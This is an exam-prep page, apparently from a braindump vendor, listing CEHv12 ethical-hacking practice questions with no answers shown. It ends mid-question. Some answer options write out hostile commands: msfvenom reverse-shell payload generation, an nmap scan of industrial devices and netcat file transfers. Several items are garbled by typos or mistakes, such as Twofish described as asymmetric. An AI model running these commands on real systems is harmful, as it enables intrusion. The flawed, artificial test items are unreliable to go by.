New Year Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtick70

312-50v12 Certified Ethical Hacker Exam (CEHv12) Questions and Answers

Questions 4

Which Nmap switch helps evade IDS or firewalls?

Options:

A.

-n/-R

B.

-0N/-0X/-0G

C.

-T

D.

-D

Buy Now
Questions 5

BitLocker encryption has been implemented for all the Windows-based computers in an organization. You are concerned that someone might lose their cryptographic key. Therefore, a mechanism was implemented to recover the keys from Active Directory. What is this mechanism called in cryptography?

Options:

A.

Key archival

B.

Key escrow.

C.

Certificate rollover

D.

Key renewal

Buy Now
Questions 6

Josh has finished scanning a network and has discovered multiple vulnerable services. He knows that several of these usually have protections against external sources but are frequently susceptible to internal users. He decides to draft an email, spoof the sender as the internal IT team, and attach a malicious file disguised as a financial spreadsheet. Before Josh sends the email, he decides to investigate other methods of getting the file onto the system. For this particular attempt, what was the last stage of the cyber kill chain that Josh performed?

Options:

A.

Exploitation

B.

Weaponization

C.

Delivery

D.

Reconnaissance

Buy Now
Questions 7

In an intricate web application architecture using an Oracle database, you, as a security analyst, have identified a potential SQL Injection attack surface. The database consists of 'x' tables, each with y columns. Each table contains z1 records. An attacker, well-versed in SQLi techniques, crafts 'u' SQL payloads, each attempting to extract maximum data from the database. The payloads include UNION SELECT' statements and 'DBMS_XSLPPOCESSOR.READ2CLOB' to read sensitive files. The attacker aims to maximize the total data extracted E=xyz'u'. Assuming 'x=4\ y=2\ and varying z' and 'u\ which situation is likely to result in the highest extracted data volume?

Options:

A.

z=400. u=4: The attacker constructs A SQLpayloads, each focusing on tables with 400 records, influencing all columns of all tables

B.

z=550, u=Z Here, the attacker formulates 2 SQL payloads and directs them towards tables containing 550 records, impacting all columns and tables

C.

z=600. u=2: The attacker devises 2 SQL payloads. each aimed at tables holding 600 records, affecting all columns across all tables

D.

Az=500. u=3: The attacker creates 3 SQL payloads and targets tables with 500 records each, exploiting all columns and tables

Buy Now
Questions 8

As a budding cybersecurity enthusiast, you have set up a small lab at home to learn more about wireless

network security. While experimenting with your home Wi-Fi network, you decide to use a well-known

hacking tool to capture network traffic and attempt to crack the Wi-Fi password. However, despite many

attempts, you have been unsuccessful. Your home Wi-Fi network uses WPA2 Personal with AES encryption.

Why are you finding it difficult to crack the Wi-Fi password?

Options:

A.

The Wi-Fi password is too complex and long

B.

Your hacking tool is outdated

C.

The network is using an uncrackable encryption method

D.

The network is using MAC address filtering.

Buy Now
Questions 9

A "Server-Side Includes" attack refers to the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary code remotely.

Which web-page file type, if it exists on the web server, is a strong indication that the server is vulnerable to this kind of attack?

Options:

A.

.stm

B.

.html

C.

.rss

D.

.cms

Buy Now
Questions 10

A network security analyst, while conducting penetration testing, is aiming to identify a service account password using the Kerberos authentication protocol. They have a valid user authentication ticket (TGT) and decided to carry out a Kerberoasting attack. In the scenario described, which of the following steps should the analyst take next?

Options:

A.

Carry out a passive wire sniffing operation using Internet packet sniffers

B.

Extract plaintext passwords, hashes, PIN codes, and Kerberos tickets using a tool like Mimikatz

C.

Perform a PRobability INfinite Chained Elements (PRINCE) attack

D.

Request a service ticket for the service principal name of the target service account

Buy Now
Questions 11

Which type of malware spreads from one system to another or from one network to another and causes similar types of damage as viruses do to the infected system?

Options:

A.

Rootkit

B.

Trojan

C.

Worm

D.

Adware

Buy Now
Questions 12

An experienced cyber attacker has created a fake Linkedin profile, successfully impersonating a high-ranking official from a well-established company, to execute a social engineering attack. The attacker then connected with other employees within the organization, receiving invitations to exclusive corporate events and gaining

access to proprietary project details shared within the network. What advanced social engineering technique has the attacker primarily used to exploit the system and what is the most likely immediate threat to the organization?

Options:

A.

Pretexting and Network Vulnerability

B.

Spear Phishing and Spam

C.

Whaling and Targeted Attacks

D.

Baiting and Involuntary Data Leakage

Buy Now
Questions 13

You are the chief cybersecurity officer at CloudSecure Inc., and your team is responsible for securing a cloudbased application that handles sensitive customer data. To ensure that the data is protected from breaches, you

have decided to implement encryption for both data-at-rest and data-in-transit. The development team suggests using SSL/TLS for securing data in transit. However, you want to also implement a mechanism to detect if the data was tampered with during transmission. Which of the following should you propose?

Options:

A.

Implement IPsec in addition to SSL/TLS.

B.

Qswitch to using SSH for data transmission.

C.

Use the cloud service provider's built-in encryption services.

D.

Encrypt data using the AES algorithm before transmission.

Buy Now
Questions 14

Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During analysis, he found that these issues are not true vulnerabilities.

What will you call these issues?

Options:

A.

False positives

B.

True negatives

C.

True positives

D.

False negatives

Buy Now
Questions 15

An attacker decided to crack the passwords used by industrial control systems. In this process, he employed a loop strategy to recover these passwords. He used one character at a time to check whether the first character entered is correct; if so, he continued the loop for consecutive characters. If not, he terminated the loop. Furthermore, the attacker checked how much time the device took to finish one complete password authentication process, through which he deduced how many characters entered are correct.

What is the attack technique employed by the attacker to crack the passwords of the industrial control systems?

Options:

A.

Side-channel attack

B.

Denial-of-service attack

C.

HMI-based attack

D.

Buffer overflow attack

Buy Now
Questions 16

Which rootkit is characterized by its function of adding code and/or replacing some of the operating-system kernel code to obscure a backdoor on a system?

Options:

A.

User-mode rootkit

B.

Library-level rootkit

C.

Kernel-level rootkit

D.

Hypervisor-level rootkit

Buy Now
Questions 17

An IT company has just implemented new security controls to their network and system setup. As a Certified Ethical Hacker, your responsibility is to assess the possible vulnerabilities in the new setup. You are given the information that the network and system are adequately patched with the latest updates, and all employees have gone through recent cybersecurity awareness training. Considering the potential vulnerability sources,

what is the best initial approach to vulnerability assessment?

Options:

A.

Checking for hardware and software misconfigurations to identify any possible loopholes

B.

Evaluating the network for inherent technology weaknesses prone to specific types of attacks

C.

Investigating if any ex-employees still have access to the company’s system and data

D.

Conducting social engineering tests to check if employees can be tricked into revealing sensitive information

Buy Now
Questions 18

While performing a security audit of a web application, an ethical hacker discovers a potential vulnerability.

The application responds to logically incorrect queries with detailed error messages that divulge the underlying database's structure. The ethical hacker decides to exploit this vulnerability further. Which type of SQL Injection attack is the ethical hacker likely to use?

Options:

A.

UNION SQL Injection

B.

Blind/inferential SQL Injection

C.

In-band SQL Injection

D.

Error-based SOL Injection

Buy Now
Questions 19

James is working as an ethical hacker at Technix Solutions. The management ordered James to discover how vulnerable its network is towards footprinting attacks. James took the help of an open-source framework for performing automated reconnaissance activities. This framework helped James in gathering information using free tools and resources. What is the framework used by James to conduct footprinting and reconnaissance activities?

Options:

A.

WebSploit Framework

B.

Browser Exploitation Framework

C.

OSINT framework

D.

SpeedPhish Framework

Buy Now
Questions 20

An attacker can employ many methods to perform social engineering against unsuspecting employees, including scareware.

What is the best example of a scareware attack?

Options:

A.

A pop-up appears to a user stating, "You have won a free cruise! Click here to claim your prize!"

B.

A banner appears to a user stating, "Your account has been locked. Click here to reset your password and unlock your account."

C.

A banner appears to a user stating, "Your Amazon order has been delayed. Click here to find out your new delivery date."

D.

A pop-up appears to a user stating, "Your computer may have been infected with spyware. Click here to install an anti-spyware tool to resolve this issue."

Buy Now
Questions 21

Which type of attack attempts to overflow the content-addressable memory (CAM) table in an Ethernet switch?

Options:

A.

Evil twin attack

B.

DNS cache flooding

C.

MAC flooding

D.

DDoS attack

Buy Now
Questions 22

Jake, a network security specialist, is trying to prevent network-level session hijacking attacks in his company.

While studying different types of such attacks, he learns about a technique where an attacker inserts their machine into the communication between a client and a server, making it seem like the packets are flowing through the original path. This technique is primarily used to reroute the packets. Which of the following types of network-level session hijacking attacks is Jake studying?

Options:

A.

RST Hijacking

B.

Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing

C.

UDP Hijacking

D.

TCP/IP Hijacking

Buy Now
Questions 23

Elliot is in the process of exploiting a web application that uses SQL as a back-end database. He’s determined that the application is vulnerable to SQL injection, and has introduced conditional timing delays into injected queries to determine whether they are successful. What type of SQL injection is Elliot most likely performing?

Options:

A.

Error-based SQL injection

B.

Blind SQL injection

C.

Union-based SQL injection

D.

NoSQL injection

Buy Now
Questions 24

Joel, a professional hacker, targeted a company and identified the types of websites frequently visited by its employees. Using this information, he searched for possible loopholes in these websites and injected a malicious script that can redirect users from the web page and download malware onto a victim's machine. Joel waits for the victim to access the infected web application so as to compromise the victim's machine. Which of the following techniques is used by Joel in the above scenario?

Options:

A.

DNS rebinding attack

B.

Clickjacking attack

C.

MarioNet attack

D.

Watering hole attack

Buy Now
Questions 25

Jude, a pen tester working in Keiltech Ltd., performs sophisticated security testing on his company's network infrastructure to identify security loopholes. In this process, he started to circumvent the network protection tools and firewalls used in the company. He employed a technique that can create forged TCP sessions by carrying out multiple SYN, ACK, and RST or FIN packets. Further, this process allowed Jude to execute DDoS attacks that can exhaust the network resources. What is the attack technique used by Jude for finding loopholes in the above scenario?

Options:

A.

UDP flood attack

B.

Ping-of-death attack

C.

Spoofed session flood attack

D.

Peer-to-peer attack

Buy Now
Questions 26

Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes. Images, and networks. What is the component of the Docker architecture used by Annie in the above scenario?

Options:

A.

Docker client

B.

Docker objects

C.

Docker daemon

D.

Docker registries

Buy Now
Questions 27

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

Options:

A.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

B.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

C.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

D.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Buy Now
Questions 28

Windows LAN Manager (LM) hashes are known to be weak.

Which of the following are known weaknesses of LM? (Choose three.)

Options:

A.

Converts passwords to uppercase.

B.

Hashes are sent in clear text over the network.

C.

Makes use of only 32-bit encryption.

D.

Effective length is 7 characters.

Buy Now
Questions 29

In the context of Windows Security, what is a 'null' user?

Options:

A.

A user that has no skills

B.

An account that has been suspended by the admin

C.

A pseudo account that has no username and password

D.

A pseudo account that was created for security administration purpose

Buy Now
Questions 30

A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his computer.

what tests would you perform to determine whether his computer Is Infected?

Options:

A.

Use ExifTool and check for malicious content.

B.

You do not check; rather, you immediately restore a previous snapshot of the operating system.

C.

Upload the file to VirusTotal.

D.

Use netstat and check for outgoing connections to strange IP addresses or domains.

Buy Now
Questions 31

In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack?

Options:

A.

Full Blown

B.

Thorough

C.

Hybrid

D.

BruteDics

Buy Now
Questions 32

What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?

Options:

A.

The attacker queries a nameserver using the DNS resolver.

B.

The attacker makes a request to the DNS resolver.

C.

The attacker forges a reply from the DNS resolver.

D.

The attacker uses TCP to poison the ONS resofver.

Buy Now
Questions 33

_________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes.

Options:

A.

Trojan

B.

RootKit

C.

DoS tool

D.

Scanner

E.

Backdoor

Buy Now
Questions 34

Yancey is a network security administrator for a large electric company. This company provides power for over 100, 000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him.

What would Yancey be considered?

Options:

A.

Yancey would be considered a Suicide Hacker

B.

Since he does not care about going to jail, he would be considered a Black Hat

C.

Because Yancey works for the company currently; he would be a White Hat

D.

Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing

Buy Now
Questions 35

What type of analysis is performed when an attacker has partial knowledge of inner-workings of the application?

Options:

A.

Black-box

B.

Announced

C.

White-box

D.

Grey-box

Buy Now
Questions 36

Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he uses MIB. which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mlb or by entering the DNS library name and Lseries.mlb. He is currently retrieving information from an MIB that contains object types for workstations and server services. Which of the following types of MIB is accessed by Garry in the above scenario?

Options:

A.

LNMIB2.MIB

B.

WINS.MIB

C.

DHCP.MIS

D.

MIB_II.MIB

Buy Now
Questions 37

Jim, a professional hacker, targeted an organization that is operating critical Industrial Infrastructure. Jim used Nmap to scan open pons and running services on systems connected to the organization's OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered Information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information?

Options:

A.

nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >

B.

nmap -Pn -sU -p 44818 --script enip-info < Target IP >

C.

nmap -Pn -sT -p 46824 < Target IP >

D.

nmap -Pn -sT -p 102 --script s7-info < Target IP >

Buy Now
Questions 38

In Trojan terminology, what is a covert channel?

Options:

A.

A channel that transfers information within a computer system or network in a way that violates the security policy

B.

A legitimate communication path within a computer system or network for transfer of data

C.

It is a kernel operation that hides boot processes and services to mask detection

D.

It is Reverse tunneling technique that uses HTTPS protocol instead of HTTP protocol to establish connections

Buy Now
Questions 39

What is one of the advantages of using both symmetric and asymmetric cryptography in SSL/TLS?

Options:

A.

Symmetric algorithms such as AES provide a failsafe when asymmetric methods fail.

B.

Asymmetric cryptography is computationally expensive in comparison. However, it is well-suited to securely negotiate keys for use with symmetric cryptography.

C.

Symmetric encryption allows the server to securely transmit the session keys out-of-band.

D.

Supporting both types of algorithms allows less-powerful devices such as mobile phones to use symmetric encryption instead.

Buy Now
Questions 40

An attacker runs netcat tool to transfer a secret file between two hosts.

He is worried about information being sniffed on the network.

How would the attacker use netcat to encrypt the information before transmitting onto the wire?

Options:

A.

Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat 1234

B.

Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat 1234

C.

Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat 1234 -pw password

D.

Use cryptcat instead of netcat

Buy Now
Questions 41

in an attempt to increase the security of your network, you Implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know It. How do you accomplish this?

Options:

A.

Delete the wireless network

B.

Remove all passwords

C.

Lock all users

D.

Disable SSID broadcasting

Buy Now
Questions 42

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session 10 to the target employee. The session ID links the target employee to Boneys account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boneys account. What is the attack performed by Boney in the above scenario?

Options:

A.

Session donation attack

B.

Session fixation attack

C.

Forbidden attack

D.

CRIME attack

Buy Now
Questions 43

John is an incident handler at a financial institution. His steps in a recent incident are not up to the standards of the company. John frequently forgets some steps and procedures while handling responses as they are very stressful to perform. Which of the following actions should John take to overcome this problem with the least administrative effort?

Options:

A.

Create an incident checklist.

B.

Select someone else to check the procedures.

C.

Increase his technical skills.

D.

Read the incident manual every time it occurs.

Buy Now
Questions 44

These hackers have limited or no training and know how to use only basic techniques or tools.

What kind of hackers are we talking about?

Options:

A.

Black-Hat Hackers A

B.

Script Kiddies

C.

White-Hat Hackers

D.

Gray-Hat Hacker

Buy Now
Questions 45

What hacking attack is challenge/response authentication used to prevent?

Options:

A.

Replay attacks

B.

Scanning attacks

C.

Session hijacking attacks

D.

Password cracking attacks

Buy Now
Questions 46

Which command can be used to show the current TCP/IP connections?

Options:

A.

Netsh

B.

Netstat

C.

Net use connection

D.

Net use

Buy Now
Questions 47

You are tasked to configure the DHCP server to lease the last 100 usable IP addresses in subnet to. 1.4.0/23. Which of the following IP addresses could be teased as a result of the new configuration?

Options:

A.

210.1.55.200

B.

10.1.4.254

C.

10..1.5.200

D.

10.1.4.156

Buy Now
Questions 48

Which of the following statements is FALSE with respect to Intrusion Detection Systems?

Options:

A.

Intrusion Detection Systems can be configured to distinguish specific content in network packets

B.

Intrusion Detection Systems can easily distinguish a malicious payload in an encrypted traffic

C.

Intrusion Detection Systems require constant update of the signature library

D.

Intrusion Detection Systems can examine the contents of the data n context of the network protocol

Buy Now
Questions 49

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.

What is this attack?

Options:

A.

Cross-site-scripting attack

B.

SQL Injection

C.

URL Traversal attack

D.

Buffer Overflow attack

Buy Now
Questions 50

While testing a web application in development, you notice that the web server does not properly ignore the “dot dot slash” (../) character string and instead returns the file listing of a folder structure of the server.

What kind of attack is possible in this scenario?

Options:

A.

Cross-site scripting

B.

Denial of service

C.

SQL injection

D.

Directory traversal

Buy Now
Questions 51

Attacker Rony Installed a rogue access point within an organization's perimeter and attempted to Intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?

Options:

A.

Distributed assessment

B.

Wireless network assessment

C.

Host-based assessment

D.

Application assessment

Buy Now
Questions 52

Scenario: Joe turns on his home computer to access personal online banking. When he enters the URL www.bank.com. the website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When he examines the website URL closer, he finds that the site is not secure and the web address appears different. What type of attack he is experiencing?.

Options:

A.

Dos attack

B.

DHCP spoofing

C.

ARP cache poisoning

D.

DNS hijacking

Buy Now
Questions 53

An organization is performing a vulnerability assessment tor mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?

Options:

A.

Product-based solutions

B.

Tree-based assessment

C.

Service-based solutions

D.

inference-based assessment

Buy Now
Questions 54

Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this. James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?

Options:

A.

ophcrack

B.

Hootsuite

C.

VisualRoute

D.

HULK

Buy Now
Questions 55

Consider the following Nmap output:

what command-line parameter could you use to determine the type and version number of the web server?

Options:

A.

-sv

B.

-Pn

C.

-V

D.

-ss

Buy Now
Questions 56

While browsing his Facebook teed, Matt sees a picture one of his friends posted with the caption. "Learn more about your friends!", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate. Matt responds to the questions on the post, a few days later. Mates bank account has been accessed, and the password has been changed. What most likely happened?

Options:

A.

Matt inadvertently provided the answers to his security questions when responding to the post.

B.

Matt's bank-account login information was brute forced.

C.

Matt Inadvertently provided his password when responding to the post.

D.

Matt's computer was infected with a keylogger.

Buy Now
Questions 57

During an Xmas scan what indicates a port is closed?

Options:

A.

No return response

B.

RST

C.

ACK

D.

SYN

Buy Now
Questions 58

Nedved is an IT Security Manager of a bank in his country. One day. he found out that there is a security breach to his company's email server based on analysis of a suspicious connection from the email server to an unknown IP Address.

What is the first thing that Nedved needs to do before contacting the incident response team?

Options:

A.

Leave it as it Is and contact the incident response te3m right away

B.

Block the connection to the suspicious IP Address from the firewall

C.

Disconnect the email server from the network

D.

Migrate the connection to the backup email server

Buy Now
Questions 59

What is the main security service a cryptographic hash provides?

Options:

A.

Integrity and ease of computation

B.

Message authentication and collision resistance

C.

Integrity and collision resistance

D.

Integrity and computational in-feasibility

Buy Now
Questions 60

During the enumeration phase. Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445.

Which of the following services is enumerated by Lawrence in this scenario?

Options:

A.

Server Message Block (SMB)

B.

Network File System (NFS)

C.

Remote procedure call (RPC)

D.

Telnet

Buy Now
Questions 61

Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a countermeasures to secure the accounts on the web server.

Which of the following countermeasures must Larry implement to secure the user accounts on the web server?

Options:

A.

Enable unused default user accounts created during the installation of an OS

B.

Enable all non-interactive accounts that should exist but do not require interactive login

C.

Limit the administrator or toot-level access to the minimum number of users

D.

Retain all unused modules and application extensions

Buy Now
Questions 62

This form of encryption algorithm is asymmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?

Options:

A.

Twofish encryption algorithm

B.

HMAC encryption algorithm

C.

IDEA

D.

Blowfish encryption algorithm

Buy Now
Questions 63

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms.

What is this document called?

Options:

A.

Information Audit Policy (IAP)

B.

Information Security Policy (ISP)

C.

Penetration Testing Policy (PTP)

D.

Company Compliance Policy (CCP)

Buy Now
Questions 64

You are performing a penetration test for a client and have gained shell access to a Windows machine on the internal network. You intend to retrieve all DNS records for the internal domain, if the DNS server is at 192.168.10.2 and the domain name is abccorp.local, what command would you type at the nslookup prompt to attempt a zone transfer?

Options:

A.

list server=192.168.10.2 type=all

B.

is-d abccorp.local

C.

Iserver 192.168.10.2-t all

D.

List domain=Abccorp.local type=zone

Buy Now
Questions 65

During the process of encryption and decryption, what keys are shared?

Options:

A.

Private keys

B.

User passwords

C.

Public keys

D.

Public and private keys

Buy Now
Questions 66

To invisibly maintain access to a machine, an attacker utilizes a toolkit that sits undetected In the core components of the operating system. What is this type of rootkit an example of?

Options:

A.

Mypervisor rootkit

B.

Kernel toolkit

C.

Hardware rootkit

D.

Firmware rootkit

Buy Now
Questions 67

Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently. Abel is verifying and validating image contents, signing images, and sending them to the registries. Which of the following tiers of the container technology architecture Is Abel currently working in?

Options:

A.

Tier-1: Developer machines

B.

Tier-4: Orchestrators

C.

Tier-3: Registries

D.

Tier-2: Testing and accreditation systems

Buy Now
Questions 68

You receive an e-mail like the one shown below. When you click on the link contained in the mail, you are redirected to a website seeking you to download free Anti-Virus software.

Dear valued customers,

We are pleased to announce the newest version of Antivirus 2010 for Windows which will probe you with total security against the latest spyware, malware, viruses, Trojans and other online threats. Simply visit the link below and enter your antivirus code:

or you may contact us at the following address:

Media Internet Consultants, Edif. Neptuno, Planta

Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a Panama

How will you determine if this is Real Anti-Virus or Fake Anti-Virus website?

Options:

A.

Look at the website design, if it looks professional then it is a Real Anti-Virus website

B.

Connect to the site using SSL, if you are successful then the website is genuine

C.

Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site

D.

Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a malware

E.

Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a malware

Buy Now
Questions 69

Daniel Is a professional hacker who Is attempting to perform an SQL injection attack on a target website. www.movlescope.com. During this process, he encountered an IDS that detects SQL Injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as ‘ 'or '1'='1" In any bask injection statement such as "or 1=1." Identify the evasion technique used by Daniel in the above scenario.

Options:

A.

Null byte

B.

IP fragmentation

C.

Char encoding

D.

Variation

Buy Now
Questions 70

The Payment Card Industry Data Security Standard (PCI DSS) contains six different categories of control objectives. Each objective contains one or more requirements, which must be followed in order to achieve compliance. Which of the following requirements would best fit under the objective, "Implement strong access control measures"?

Options:

A.

Regularly test security systems and processes.

B.

Encrypt transmission of cardholder data across open, public networks.

C.

Assign a unique ID to each person with computer access.

D.

Use and regularly update anti-virus software on all systems commonly affected by malware.

Buy Now
Questions 71

At what stage of the cyber kill chain theory model does data exfiltration occur?

Options:

A.

Actions on objectives

B.

Weaponization

C.

installation

D.

Command and control

Buy Now
Questions 72

Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session, upon receiving the users request. Bobby manipulated the traffic with the virtual tower and redirected the victim to a malicious website. What is the attack performed by Bobby in the above scenario?

Options:

A.

Wardriving

B.

KRACK attack

C.

jamming signal attack

D.

aLTEr attack

Buy Now
Questions 73

Alice needs to send a confidential document to her coworker. Bryan. Their company has public key infrastructure set up. Therefore. Alice both encrypts the message and digitally signs it. Alice uses_______to encrypt the message, and Bryan uses__________to confirm the digital signature.

Options:

A.

Bryan’s public key; Bryan’s public key

B.

Alice’s public key; Alice’s public key

C.

Bryan’s private key; Alice’s public key

D.

Bryan’s public key; Alice’s public key

Buy Now
Questions 74

You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles.

You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems.

In other words, you are trying to penetrate an otherwise impenetrable system.

How would you proceed?

Options:

A.

Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network

B.

Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information

C.

Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100, 000 or more "zombies" and "bots"

D.

Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

Buy Now
Questions 75

You are a penetration tester working to test the user awareness of the employees of the client xyz. You harvested two employees' emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at?

Options:

A.

Reconnaissance

B.

Command and control

C.

Weaponization

D.

Exploitation

Buy Now
Questions 76

This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-2S6. MMAC-SHA384, and ECDSA using a 384-bit elliptic curve. Which is this wireless security protocol?

Options:

A.

WPA2 Personal

B.

WPA3-Personal

C.

WPA2-Enterprise

D.

WPA3-Enterprise

Buy Now
Questions 77

Which file is a rich target to discover the structure of a website during web-server footprinting?

Options:

A.

Document root

B.

Robots.txt

C.

domain.txt

D.

index.html

Buy Now
Questions 78

David is a security professional working in an organization, and he is implementing a vulnerability management program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities. Which phase of the vulnerability-management life cycle is David currently in?

Options:

A.

verification

B.

Risk assessment

C.

Vulnerability scan

D.

Remediation

Buy Now
Questions 79

what is the port to block first in case you are suspicious that an loT device has been compromised?

Options:

A.

22

B.

443

C.

48101

D.

80

Buy Now
Questions 80

Bella, a security professional working at an it firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames. and passwords are shared In plaintext, paving the way for hackers 10 perform successful session hijacking. To address this situation. Bella Implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols Is used by Bella?

Options:

A.

FTP

B.

HTTPS

C.

FTPS

D.

IP

Buy Now
Questions 81

Which of the following is a low-tech way of gaining unauthorized access to systems?

Options:

A.

Social Engineering

B.

Eavesdropping

C.

Scanning

D.

Sniffing

Buy Now
Questions 82

Shellshock allowed an unauthorized user to gain access to a server. It affected many Internet-facing services, which OS did it not directly affect?

Options:

A.

Linux

B.

Unix

C.

OS X

D.

Windows

Buy Now
Questions 83

Which of the following describes the characteristics of a Boot Sector Virus?

Options:

A.

Modifies directory table entries so that directory entries point to the virus code instead of the actual program.

B.

Moves the MBR to another location on the RAM and copies itself to the original location of the MBR.

C.

Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.

D.

Overwrites the original MBR and only executes the new virus code.

Buy Now
Questions 84

E-mail scams and mail fraud are regulated by which of the following?

Options:

A.

18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers

B.

18 U.S.C. par. 1029 Fraud and Related activity in connection with Access Devices

C.

18 U.S.C. par. 1362 Communication Lines, Stations, or Systems

D.

18 U.S.C. par. 2510 Wire and Electronic Communications Interception and Interception of Oral Communication

Buy Now
Questions 85

Which of the following is a component of a risk assessment?

Options:

A.

Administrative safeguards

B.

Physical security

C.

DMZ

D.

Logical interface

Buy Now
Questions 86

What is the minimum number of network connections in a multihomed firewall?

Options:

A.

3

B.

5

C.

4

D.

2

Buy Now
Questions 87

Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN?

Options:

A.

ESP transport mode

B.

ESP confidential

C.

AH permiscuous

D.

AH Tunnel mode

Buy Now
Questions 88

What is the known plaintext attack used against DES which gives the result that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key?

Options:

A.

Man-in-the-middle attack

B.

Meet-in-the-middle attack

C.

Replay attack

D.

Traffic analysis attack

Buy Now
Questions 89

The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE’s Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520.

